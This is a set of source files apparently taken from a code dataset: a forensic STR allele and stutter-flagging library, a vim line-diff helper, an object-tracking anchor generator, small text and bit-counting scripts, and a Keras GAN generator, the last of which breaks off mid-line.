\"D22S1045\": \"Red\"}\n\n\nclass AlleleUnit:\n\n def __init__(self, allele, locus=None):\n if allele in [\"X\", \"Y\", \"INC\", \"OB\", \"OL\"]:\n self.locusType = \"Character\"\n self.allele = allele\n else:\n self.locusType = \"Number\"\n bps, reps = math.modf(float(allele))\n self.basepairs = round(bps * 10)\n self.repeats = int(reps)\n self.basepairsPerRepeat = self.assign_bp_per_repeat(locus)\n\n self.locus = locus\n\n def assign_bp_per_repeat(self, locus):\n if locus is not None:\n return self.look_up_bp_in_repeat(locus)\n else:\n return 0\n\n nonTetramerDict = {\"Penta D\": 5, \"Penta E\": 5, \"D22S1045\": 3}\n\n def confirm_locus(self, locus):\n return (locus in loci)\n \n def look_up_bp_in_repeat(self, locus):\n if locus in self.nonTetramerDict:\n return self.nonTetramerDict[locus]\n else:\n return 4\n\n def convert_to_bp(self):\n return (self.repeats * self.basepairsPerRepeat) + self.basepairs\n\n def convert_to_repeats(self, repeats):\n return float(str(repeats//self.basepairsPerRepeat)+\".\"+str(repeats%self.basepairsPerRepeat))\n\n def __eq__(self, other):\n return self.__str__() == other.__str__()\n\n def __ne__(self, other):\n return (not self.__eq__(other))\n\n def __lt__(self, other):\n if self.locusType == \"Character\" or other.locusType == \"Character\":\n return self.__str__() < other.__str__()\n else:\n return float(self.__repr__()) < float(other.__repr__())\n\n def __hash__(self):\n return hash(self.__repr__())\n\n def __repr__(self):\n if self.locusType == \"Number\":\n if self.basepairs != 0:\n allele = str(self.repeats)+\".\"+str(self.basepairs)\n else:\n allele = str(self.repeats)\n else:\n allele = self.allele\n return allele\n\n def __str__(self):\n if self.locusType == \"Number\":\n if self.basepairs != 0:\n allele = \"Allele: \"+str(self.repeats)+\".\"+str(self.basepairs)\n else:\n allele = \"Allele: \"+str(self.repeats)\n else:\n allele = \"Allele: \"+self.allele\n return allele\n\n def add(self, other):\n basepairs1 = self.convert_to_bp()\n basepairs2 = other.convert_to_bp()\n totalBasepairs = basepairs1 + basepairs2\n 
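# Editor's note: the floor-division/modulo pair just below converts the summed\n# base-pair count back into 'repeats.microvariant' notation. A hedged worked\n# example at a tetramer locus (4 bp per repeat), assuming the classes in this\n# file behave as written: allele 11.2 is 11*4 + 2 = 46 bp, adding one full\n# repeat (allele '1', 4 bp) gives 50 bp, and 50 // 4 = 12 with 50 % 4 = 2,\n# i.e. allele 12.2.\n#\n# a = AlleleUnit('11.2', 'TPOX')  # TPOX repeats are 4 bp long\n# a.add(AlleleUnit('1', 'TPOX'))\n# assert repr(a) == '12.2'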
self.repeats = totalBasepairs//self.basepairsPerRepeat\n self.basepairs = totalBasepairs%self.basepairsPerRepeat\n\n def subtract(self, other):\n basepairs1 = self.convert_to_bp()\n basepairs2 = other.convert_to_bp()\n totalBasepairs = basepairs1 - basepairs2\n self.repeats = totalBasepairs//self.basepairsPerRepeat\n self.basepairs = totalBasepairs%self.basepairsPerRepeat\n\n\n\nclass Profile:\n \"\"\"\n The Profile class expects a list of strings.\n The first string is the sample name\n and the rest are the loci as strings.\n It expects comma seperated alleles.\n It accepts profiles as Genotypes or Phenotypes\n it internally converts them to phenotypes.\n \"\"\"\n\n def __init__(self, profilesArray, mixName=None):\n \"\"\"\n Work on this section I am trying to make it so that I can take multiple input profiles\n or just one profile and if multiple combine them, then process the profiles as usual\n if multiple it should get a mixName and apply that to the mixture\n\n mixName should be the same as the mix name in the sample name So that it can be looked up\n as in does mixName appear in sample name in case multiple mixtures are found in a single\n plate of data\n \"\"\"\n\n # I want to throw an error if there are multiple profiles but no mixName\n self.mixName = mixName\n tempProfileArray = []\n if len(profilesArray) > 1:\n tempProfileArray = list(map(\",\".join,zip(*profilesArray)))\n else:\n tempProfileArray = profilesArray[0]\n\n self.sampleName, profileArray = tempProfileArray[0], tempProfileArray[1:]\n if mixName != None:\n self.sampleName = self.mixName\n\n profileArray = [profile.split(',') for profile in profileArray]\n\n profileArray = list(zip(loci, profileArray))\n alleleArray = [[AlleleUnit(allele, locus[0]) for allele in locus[1]]for locus in profileArray]\n alleleArrayToPhenotype = []\n\n for locus in alleleArray:\n tempLocus = list(set(locus))\n tempLocus.sort()\n alleleArrayToPhenotype.append(tempLocus)\n\n self.profile = dict(zip(loci, alleleArrayToPhenotype))\n\n def combineWith(self, other):\n for value in self.profile:\n tempValuesSelf = self.profile[value]\n tempValuesOther = other.profile[value]\n tempValuesSelf.extend(tempValuesOther)\n\n tempValuesSelf = list(set(tempValuesSelf))\n tempValuesSelf.sort()\n if AlleleUnit(\"INC\") in tempValuesSelf and len(tempValuesSelf) > 1:\n tempValuesSelf.remove(AlleleUnit(\"INC\"))\n self.profile[value] = tempValuesSelf\n return self.profile\n\n def __str__(self):\n header = \"Sample Name\\t\"+\"\\t\".join(loci)\n profilePrint = self.sampleName+\"\\t\"\n for locus in loci:\n alleles = self.profile[locus]\n if len(alleles) > 1:\n alleles = [allele.__repr__() for allele in alleles]\n profilePrint = profilePrint+\",\".join(alleles)\n profilePrint = profilePrint+\"\\t\"\n else:\n profilePrint = profilePrint+alleles[0].__repr__()+\"\\t\"\n return header+\"\\n\"+profilePrint+\"\\n\"\n\n\nclass ProfileDB:\n def __init__(self, profileCSVFile):\n tempProfilesList = []\n with open(profileCSVFile, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n tempProfilesList.append(line)\n self.profilesHeaderRow = tempProfilesList.pop(0)\n tempProfilesDB = []\n for profile in tempProfilesList:\n tempProfile = Profile([profile])\n tempProfilesDB.append(tempProfile)\n self.profilesDB = tempProfilesDB\n\n def getProfile(self, searchName):\n foundProfile = None\n for profile in self.profilesDB:\n if profile != None and profile.sampleName == searchName:\n foundProfile = profile\n return foundProfile\n\n def 
addMixes(self, mixFile):\n \"\"\"This takes a list of profiles and turns in into a single profile\n that combines all the profiles; profiles are 25 elements\"\"\"\n\n tempMixArray = []\n\n with open(mixFile, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n tempMixArray.append(line)\n numProfiles = len(tempMixArray)\n\n\n\n for x in range(1, numProfiles):\n tempMixProfile = None\n tempMixName = tempMixArray[x][0]+\"-\"+tempMixArray[x][1]\n for y in range(2, 2 + int(tempMixArray[x][1])):\n if tempMixProfile == None:\n tempMixProfile = self.getProfile(tempMixArray[x][y])\n tempMixProfile.sampleName = tempMixName\n else:\n combinedProfile = tempMixProfile.combineWith(self.getProfile(tempMixArray[x][y]))\n tempMixProfile.profile = combinedProfile\n\n if tempMixProfile != None:\n self.profilesDB.append(tempMixProfile)\n\n def __str__(self):\n headerRow = \"\\t\".join(self.profilesHeaderRow)+\"\\n\"\n profileDBString = headerRow\n for profile in self.profilesDB:\n tempProfileString = profile.__str__().split(\"\\n\")[1]\n profileDBString += tempProfileString+\"\\n\"\n return profileDBString\n\n\nclass ReportDB:\n \"\"\" follow the ProfileDB class and pull from the stutter flagger file\n this should make up dictionary of file names that have a list made up\n of all the lines that have that file name\n \"\"\"\n\n def __init__(self, file):\n inputFile = []\n self.fileName = file\n\n with open(self.fileName, newline='') as data:\n data_reader = csv.reader(data, delimiter='\\t')\n for line in data_reader:\n inputFile.append(line)\n\n tempHeaderRow = inputFile.pop(0)\n tempHeaderRow[0] = \"#\"\n tempHeaderRow.append(\"NOC\")\n tempHeaderRow.append(\"Type\")\n\n\n self.reportHeaderRow = tempHeaderRow\n\n\n self.report = inputFile\n\n self.Marker = self.reportHeaderRow.index(\"Marker\")\n self.Dye = self.reportHeaderRow.index(\"Dye\")\n self.Size = self.reportHeaderRow.index(\"Size\")\n self.Allele = self.reportHeaderRow.index(\"Allele\")\n self.Sample_Comments = self.reportHeaderRow.index(\"Sample Comments\")\n self.Height = self.reportHeaderRow.index(\"Height\")\n self.NOC = self.reportHeaderRow.index(\"NOC\")\n self.Program_Output = self.reportHeaderRow.index(\"Type\")\n self.profilesInDB = self.profile_codes()\n self.sampleProperties = self.define_sample_properties()\n\n self.sampleList = self.sample_set()\n self.samplesSorted = self.collect_sample_data()\n self.samplePropertiesDict = self.make_properties_dict()\n\n self.samplePullupDict = self.make_pullup_dict()\n\n def profile_codes(self):\n \"\"\"Takes a list of profiles as lines from the input and splits them\n using the underscore character and takes the sample name. This excludes\n the ladder and the Amp Neg samples. 
All other samples including the\n Amp Pos sample are added to the set.\"\"\"\n\n \"\"\"Changed to use only manually specified profiles for mixtures \n where samples are not in the file name anymore.\"\"\"\n profilesSet = set()\n for sample in self.report:\n profileCode = sample[1].split(\"_\")[1]\n if profileCode not in ['Allelic Ladder', 'Amp Neg']:\n profilesSet.add(profileCode)\n return profilesSet\n\n def sample_set(self):\n \"\"\"This produces a list of all the samples in the input file\n by file name.\"\"\"\n sampleSet = set()\n for line in self.report:\n sampleSet.add(line[1])\n return sampleSet\n\n def collect_sample_data(self):\n \"\"\"This divides the input file into lists by sample file name.\n This is used to feed the data sample by sample through the application.\"\"\"\n dataBySample = []\n\n for sample in self.sampleList:\n sampleDataOnly = []\n for line in self.report:\n if line[1] == sample:\n sampleDataOnly.append(line)\n dataBySample.append(sampleDataOnly)\n return dataBySample\n\n def make_properties_dict(self):\n propertiesDict = {}\n\n for sample in self.sampleList:\n propertiesDict[sample] = SampleProperties(sample)\n return propertiesDict\n\n def make_pullup_dict(self):\n pullupDict = {}\n\n for sample in self.sampleList:\n pullupDict[sample] = SamplePullup(sample)\n return pullupDict\n\n\n def mark_parent_peaks(self, profilesDB):\n \"\"\"This function marks the parent peaks for the current data set.\n This iterates through the lines of the input and marks parent peaks.\n\n It skips the Amelogenin and DYS391 loci.\n\n It checks for the following issues: overlapping, dropout,\n saturation, and ILS failure. While determining if there is dropout it\n sets the flags if dropout is found.\"\"\"\n for sampleSet in self.samplesSorted:\n sampleName = sampleSet[1][1]\n NOC = 1\n if \"Mix\" in sampleSet[1][1].split(\"_\")[1]:\n name = sampleSet[1][1].split(\"_\")[1]\n if len(sampleSet[1][1].split(\"_\")[2].split(\"-\")) == 1:\n NOC = len(sampleSet[1][1].split(\"_\")[3].split(\"-\"))\n else:\n NOC = len(sampleSet[1][1].split(\"_\")[2].split(\"-\"))\n sampleForData = name+\"-\"+str(NOC)\n elif \"Amp_Pos\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n elif \"Positive\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n elif \"Amp_Neg\" in sampleSet[1][1]:\n sampleForData = \"Amp Neg\"\n elif \"Ladder\" in sampleSet[1][1]:\n sampleForData = \"Ladder\"\n else:\n sampleForData = sampleSet[1][1].split(\"_\")[1]\n profileForData = profilesDB.getProfile(sampleForData)\n for peak in sampleSet:\n\n peak.append(str(NOC))\n if peak[self.Marker] != '' and sampleForData not in [\"Ladder\", \"Amp Neg\"] \\\n and peak[self.Sample_Comments] not in \\\n [\"ILS Failure\", \"ILS Fails\", \"Misplating Fails\", \"Size Call Failed\"]:\n currentAllele = AlleleUnit(peak[self.Allele])\n\n if currentAllele in profileForData.profile[peak[self.Marker]]:\n peak.append(\"Par\")\n if peak[self.Dye] == \"Blue\":\n self.samplePullupDict[sampleName].Blue.append(peak[self.Size])\n elif peak[self.Dye] == \"Green\":\n self.samplePullupDict[sampleName].Green.append(peak[self.Size])\n elif peak[self.Dye] == \"Yellow\":\n self.samplePullupDict[sampleName].Yellow.append(peak[self.Size])\n elif peak[self.Dye] == \"Red\":\n self.samplePullupDict[sampleName].Red.append(peak[self.Size])\n\n currentPropDict = self.samplePropertiesDict[sampleName].loci[peak[self.Marker]]\n #self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Peak_BP.append(peak[self.Size])\n currentPropDict.Peak_BP.append(peak[self.Size])\n 
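# Editor's note: the sizes and allele calls accumulated here are what\n# mark_stutter() later compares candidate peaks against, using a +/- 0.5 bp\n# window around each expected stutter offset. A hedged standalone restatement\n# of that window test (illustrative names, not part of this file):\n#\n# def in_window(parent_bp, peak_bp, offset_bp):\n#     return (parent_bp - 0.5 + offset_bp) <= peak_bp <= (parent_bp + 0.5 + offset_bp)\n#\n# # back stutter one tetramer repeat (4 bp) below a 120.3 bp parent:\n# assert in_window(120.3, 116.5, -4.0)      # window is 115.8 .. 116.8\n# assert not in_window(120.3, 117.0, -4.0)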
#self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Peak_Profiles.append(peak[self.Allele])\n currentPropDict.Peak_Profiles.append(peak[self.Allele])\n #self.samplePropertiesDict[sampleName].loci[peak[self.Marker]].Channel = peak[self.Channel]\n currentPropDict.Channel = peak[self.Dye]\n\n else:\n peak.append(\"X\")\n\n elif \"Fail\" in peak[self.Sample_Comments]:\n peak.append(\"Fail\")\n else:\n peak.append(\"X\")\n\n\n # Rework the following three functions to work with the current structure of the program\n def in_stutter_position(self, parent, position, allele):\n \"\"\"This function determines if a non-parent peak is in stutter position\n based on allele bin.\"\"\"\n locus = allele[self.Marker]\n if allele[self.Allele] not in [\"OL\"]:\n return AlleleUnit(parent,locus).add(AlleleUnit(position,locus)) == AlleleUnit(allele[self.Allele])\n else:\n return False\n\n def is_loci_of_interest(self, locus):\n \"\"\"Determines if the locus is one of the loci we are analyzing in this\n study only for tetramer locations only. Penta D and E and D22S1045 are\n handled separately.\"\"\"\n return locus not in ['', \"AMEL\"]\n\n def is_allele_markable(self, flagData, peak, peakNumber):\n \"\"\"Determines if the current potential stutter peak is markable\n based on the following criteria.\"\"\"\n return peakNumber in flagData[peak[self.Marker]][\"Called Peaks\"] \\\n and peak[self.Program_Output] == \"X\"\n\n def is_within_bp_range(self, parentPeak, peak, stutterPos):\n \"\"\"Determines if the potential stutter peak is in stutter position\n based on the size of the parent peaks at the locus.\"\"\"\n return ((float(parentPeak) - 0.5) + stutterPos) \\\n <= float(peak[self.Size]) \\\n <= ((float(parentPeak) + 0.5) + stutterPos)\n\n\n def mark_stutter(self, profilesDB):\n \"\"\"\n This function marks all stutter peaks.\n Peaks are labeled db b hb or f followed by the number of the parent peak.\n\n remember that some locations aren't repeats of 4bp\n Penta loci have 5 basepair repeats and D22S1045 has 3 basepair repeats.\n These loci are separated from the tetramer loci.\n\n This function checks flags to determine if the allele can be used.\n \"\"\"\n\n for sampleSet in self.samplesSorted:\n #NOC = -1\n if \"Mix\" in sampleSet[1][1].split(\"_\")[1]:\n name = sampleSet[1][1].split(\"_\")[1]\n NOC = len(sampleSet[1][1].split(\"_\")[2].split(\"-\"))\n sampleForData = name + \"-\" + str(NOC)\n elif \"Amp_Pos\" in sampleSet[1][1]:\n sampleForData = \"Amp Pos\"\n #NOC = 1\n elif \"Ladder\" in sampleSet[1][1]:\n sampleForData = \"Ladder\"\n else:\n sampleForData = sampleSet[1][1].split(\"_\")[1]\n #NOC = 1\n profileForData = profilesDB.getProfile(sampleForData)\n\n for peak in sampleSet:\n #peak[self.NOC] = NOC\n if self.is_loci_of_interest(peak[self.Marker]):\n alleles = self.samplePropertiesDict[sampleSet[1][1]].loci[peak[self.Marker]].Peak_Profiles\n peakSizes = self.samplePropertiesDict[sampleSet[1][1]].loci[peak[self.Marker]].Peak_BP\n for x in range(len(alleles)):\n repeatMultiple = 0\n if peak[self.Marker] not in [\"D22S1045\", \"Penta D\", \"Penta E\"]:\n repeatMultiple = 4\n elif peak[self.Marker] == \"D22S1045\":\n repeatMultiple = 3\n else:\n repeatMultiple = 5\n parentPeak = peakSizes[x]\n parentAllele = alleles[x]\n\n\n\n if self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -1)) \\\n or self.in_stutter_position(parentAllele, -1, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"b\"\n else:\n peak[self.Program_Output] = 
peak[self.Program_Output]+\",b\"\n\n elif self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -2)) \\\n or self.in_stutter_position(parentAllele, -2, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"db\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",db\"\n\n elif repeatMultiple == 4 and (self.is_within_bp_range(parentPeak, peak, (repeatMultiple * -0.5)) \\\n or self.in_stutter_position(parentAllele, -0.2, peak)):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"hb\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",hb\"\n\n elif self.is_within_bp_range(parentPeak, peak, (repeatMultiple * 1)) \\\n or self.in_stutter_position(parentAllele, 1, peak):\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"f\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",f\"\n\n def mark_pullup(self):\n \"\"\"\n This function takes the pullupList from definePullup and use a test\n \"\"\"\n for sampleSet in self.samplesSorted:\n\n sampleName = sampleSet[1][1]\n\n\n for peak in sampleSet:\n if peak[self.Dye] == \"Blue\":\n for peakSize in self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Yellow + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Green\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Yellow + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Yellow\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Red:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n elif peak[self.Dye] == \"Red\":\n for peakSize in self.samplePullupDict[sampleName].Blue + self.samplePullupDict[sampleName].Green + self.samplePullupDict[sampleName].Yellow:\n if float(peak[self.Size]) - 0.5 <= float(peakSize) \\\n <= float(peak[self.Size]) + 0.5:\n if peak[self.Program_Output] == \"X\":\n peak[self.Program_Output] = \"pullup\"\n else:\n peak[self.Program_Output] = peak[self.Program_Output] + \",pullup\"\n\n\n def write_output(self):\n outputFileName = self.fileName.rsplit('.', 1)[0]\n\n outputFile = open(outputFileName + \"_newoutput.tsv\", \"w\")\n outputFile.write(\"\\t\".join(self.reportHeaderRow)+\"\\n\")\n for line in self.report:\n outputFile.write(\"\\t\".join(line)+\"\\n\")\n outputFile.close()\n\n\n def define_sample_properties(self):\n return {0: 0}\n\n\n def __str__(self):\n headerRow = \"\\t\".join(self.reportHeaderRow)+\"\\n\"\n reportDBString = headerRow\n for line in self.report:\n tempReportString = \"\\t\".join(line)\n reportDBString += tempReportString+\"\\n\"\n return reportDBString\n\n\nclass LocusProperties:\n def __init__(self):\n\n self.Channel = \"\"\n self.Saturation = False\n 
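# Editor's note: initialising the mutable list attributes in __init__ (rather\n# than as class-level defaults) is what keeps each locus's peak lists\n# independent between instances. A hedged dataclass equivalent, shown for\n# comparison only and assuming nothing beyond the attributes defined here:\n#\n# from dataclasses import dataclass, field\n#\n# @dataclass\n# class LocusPropertiesSketch:\n#     Channel: str = ''\n#     Saturation: bool = False\n#     Drop_Out: bool = False\n#     Peak_BP: list = field(default_factory=list)\n#     Peak_Profiles: list = field(default_factory=list)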
self.Drop_Out = False\n self.Peak_BP = []\n self.Peak_Profiles = []\n\n def __str__(self):\n return \"Channel: \"+self.Channel+\"\\n\"+\"Saturation: \"+str(self.Saturation)+\"\\n\"+\\\n \"Drop out: \"+str(self.Drop_Out)+\"\\n\"+\"Peak Profiles: \"+str(self.Peak_Profiles)+\"\\n\"+\\\n \"Peak BP: \"+str(self.Peak_BP)+\"\\n\"\n\n\nclass SampleProperties:\n def __init__(self, sampleName):\n self.sampleName = sampleName\n\n self.loci = {\n \"AMEL\": LocusProperties(), \"D3S1358\": LocusProperties(), \"D1S1656\": LocusProperties(),\n \"D2S441\": LocusProperties(), \"D10S1248\": LocusProperties(), \"D13S317\": LocusProperties(),\n \"Penta E\": LocusProperties(), \"D16S539\": LocusProperties(), \"D18S51\": LocusProperties(),\n \"D2S1338\": LocusProperties(), \"CSF1PO\": LocusProperties(), \"Penta D\": LocusProperties(),\n \"TH01\": LocusProperties(), \"vWA\": LocusProperties(), \"D21S11\": LocusProperties(),\n \"D7S820\": LocusProperties(), \"D5S818\": LocusProperties(), \"TPOX\": LocusProperties(),\n \"DYS391\": LocusProperties(), \"D8S1179\": LocusProperties(), \"D12S391\": LocusProperties(),\n \"D19S433\": LocusProperties(), \"FGA\": LocusProperties(), \"D22S1045\": LocusProperties()}\n\n def __str__(self):\n\n\n outputString = \"\"\n for locus in self.loci:\n outputString += locus\n outputString += \"\\n\"\n outputString += self.loci[locus].__str__()\n\n\n return \"Sample name: \"+self.sampleName+\"\\n\"+outputString\n\nclass SamplePullup:\n \"\"\"\n This function takes the flagdata at the \"Peak BP\" location for\n all keys in dictionary and makes a set of those data points in\n case any overlap this list is passed to the next function to filter\n the all called peaks\n \"\"\"\n\n def __init__(self, sampleName):\n self.sampleName = sampleName\n self.Blue = []\n self.Green = []\n self.Yellow = []\n self.Red = []\n\n def __str__(self):\n blue = \"\\, \".join(self.Blue)+\"\\n\"\n green = \"\\, \".join(self.Green)+\"\\n\"\n yellow = \"\\, \".join(self.Yellow)+\"\\n\"\n red = \"\\, \".join(self.Red)+\"\\n\"\n return \"Pullup BP: \"+\"\\n\"+blue+green+yellow+red\n\n\nclass TestAlleleUnit(unittest.TestCase):\n\n def test_microvariant(self):\n self.assertFalse(AlleleUnit(14.1, \"TPOX\") == AlleleUnit(14, \"TPOX\"))\n self.assertFalse(AlleleUnit(11.3, \"TPOX\") == AlleleUnit(11.2, \"TPOX\"))\n self.assertTrue(AlleleUnit(10, \"TPOX\") == AlleleUnit(10.0, \"TPOX\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"strlibrary.py","file_name":"strlibrary.py","file_ext":"py","file_size_in_byte":26882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571040085","text":"import vim\nimport sys\ns1 = sys.argv[0]\ns2 = sys.argv[1]\ns3 = [str(i + 1) for i in xrange(len(s1)) if s1[i] != s2[i]]\nvim.command(\"hi ColorColumn ctermbg=lightblue ctermfg=darkred\" )\ns4 = \"set colorcolumn=\" + \",\".join(s3)\ns5 = vim.eval(\"&colorcolumn\")\nif(\",\".join(s3) == s5):\n vim.command(\"set colorcolumn=\")\nelse:\n vim.command(s4)\n","sub_path":"bundle/2linediff/twolinediffcomp.py","file_name":"twolinediffcomp.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166389903","text":"# Copyright (c) SenseTime. 
All Rights Reserved.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport math\n\nimport numpy as np\n\nfrom pysot.utils.bbox import corner2center, center2corner\n\n\nclass Anchors:\n \"\"\"\n This class generate anchors.\n \"\"\"\n def __init__(self, stride, ratios, scales, image_center=0, size=0):\n self.stride = stride\n self.ratios = ratios\n self.scales = scales\n self.image_center = image_center\n # size of the rpn output\n # siamrpn++: 25, siamrpn: 17\n self.size = size\n # typically, anchor_num = 5\n self.anchor_num = len(self.scales) * len(self.ratios)\n\n self.anchors = None\n\n self.generate_anchors()\n\n def generate_anchors(self):\n \"\"\"\n generate anchors based on predefined configuration\n \"\"\"\n # Generate the bbox center on (0,0),the bbox_num = anchor_num\n # anchor_num = len(anchor_ratios)*len(anchor_scales)\n self.anchors = np.zeros((self.anchor_num, 4), dtype=np.float32)\n size = self.stride * self.stride\n count = 0\n for r in self.ratios:\n ws = int(math.sqrt(size*1. / r))\n hs = int(ws * r)\n\n for s in self.scales:\n w = ws * s\n h = hs * s\n self.anchors[count][:] = [-w*0.5, -h*0.5, w*0.5, h*0.5][:]\n count += 1\n\n def generate_all_anchors(self, im_c, size):\n \"\"\"\n im_c: image center\n size: image size\n \"\"\"\n if self.image_center == im_c and self.size == size:\n return False\n # 127\n self.image_center = im_c\n # 25\n self.size = size\n # To calculate the position of the first anchor's\n # coordinate in the search_region.\n\n # The meaning of anchor.stride:The distance in the\n # search region of the corresponding adjacent anchor\n\n # Assuming the center of search region just is the\n # center of the feature map(generated by backbone like resnet 50),\n # the corresponding center can be calculated \n # cx = search_region_center_coordinate -\n # floor(feature_map.shape(0)/2)*self.stride\n\n # the origin of the coordinate: the top left corner \n # of the search region\n a0x = im_c - size // 2 * self.stride\n ori = np.array([a0x] * 4, dtype=np.float32)\n # zero_anchors.shape = (5,4)\n zero_anchors = self.anchors + ori\n # x1.shape = (5,1)\n x1 = zero_anchors[:, 0]\n y1 = zero_anchors[:, 1]\n x2 = zero_anchors[:, 2]\n y2 = zero_anchors[:, 3]\n #x1.shape = (5,1,1)\n x1, y1, x2, y2 = map(lambda x: x.reshape(self.anchor_num, 1, 1),\n [x1, y1, x2, y2])\n cx, cy, w, h = corner2center([x1, y1, x2, y2])\n # disp_x.shape=(1,1,25)\n disp_x = np.arange(0, size).reshape(1, 1, -1) * self.stride\n disp_y = np.arange(0, size).reshape(1, -1, 1) * self.stride\n # cx.shape(5,1,25)\n cx = cx + disp_x\n cy = cy + disp_y\n\n # broadcast\n # zero.shape=(5,25,25)\n zero = np.zeros((self.anchor_num, size, size), dtype=np.float32)\n # cx.shape=(5,25,25)\n cx, cy, w, h = map(lambda x: x + zero, [cx, cy, w, h])\n x1, y1, x2, y2 = center2corner([cx, cy, w, h])\n\n self.all_anchors = (np.stack([x1, y1, x2, y2]).astype(np.float32),\n np.stack([cx, cy, w, h]).astype(np.float32))\n # all_anchors[0].shape = (4,anchor_num,W,H), the bbox coordinate(in the search region)\n # all_anchors[1].shape = (4,anchor_num,W,H),same content,but in the center format \n return True\n","sub_path":"pysot/utils/anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"59739848","text":"def check(x):\n x = bin(x)\n x = x[2:]\n dcount = 0\n rcount = 0\n# print(len(x))\n for item 
in x:\n if item == \"0\": dcount = dcount + 1\n if item == \"1\": rcount = rcount + 1\n if dcount == 20 and rcount == 20:\n return True\n else:\n return False\ncounter = 0\nfor x in range(2**39,2**40):\n if check(x): counter = counter + 1\n if x % 100000 == 0:\n print(float(x)/2**40)\nprint(counter)\n","sub_path":"15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"623797724","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport jieba_fast as jieba\nimport os\nimport sys\ndef textSeg(sourefile0,targetfile0):\n targetfile = targetfile0 + '/sents.txt'\n f_w = open(targetfile, 'w+')\n k = 0\n for p in range(5):\n sourefile = sourefile0+'/part-0000'+str(p)\n f_r = open(sourefile,'r')\n for line in f_r:\n line = line.strip().lower()\n s = line.split('\\t')\n if len(s)!=3:\n continue\n words = \" \".join(jieba.lcut(s[2], HMM=True))\n f_w.write(words+'\\n')\n k+=1\n if k%10000==0:\n print('write %d lines'%k)\n f_r.close()\n #os.remove(sourefile)\n f_w.close()\ndef main(sourefile):\n if not os.path.exists(sourefile+'-seg'):\n os.mkdir(sourefile+'-seg')\n textSeg(sourefile,sourefile+'-seg')\n #os.remove(sourefile)\nif __name__=='__main__':\n sourcefile = sys.argv[1]\n main(sourcefile)","sub_path":"myscript/textseg.py","file_name":"textseg.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"483027639","text":"# example of defining the generator model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Reshape\nfrom keras.layers import Conv2D\nfrom keras.layers import Conv2DTranspose\nfrom keras.layers import LeakyReLU\n# use plain ndarray helpers; numpy.matlib is deprecated and returns np.matrix\nfrom numpy.random import randn\nfrom numpy import zeros\n\n\n# define the standalone generator model\ndef define_generator(latent_dim):\n model = Sequential()\n # foundation for 7x7 image\n n_nodes = 128 * 7 * 7\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((7, 7, 128)))\n # upsample to 14x14\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 28x28\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(1, (7,7), activation='sigmoid', padding='same'))\n return model\n\n\n# generate points in latent space as input for the generator\ndef generate_latent_points(latent_dim, n_samples):\n # generate points in the latent space\n x_input = randn(latent_dim * n_samples)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n_samples, latent_dim)\n return x_input\n\n\n# use the generator to generate n fake examples, with class labels\ndef generate_fake_samples(g_model, latent_dim, n_samples):\n # generate points in latent space\n x_input = generate_latent_points(latent_dim, n_samples)\n # predict outputs\n X = g_model.predict(x_input)\n # create 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, 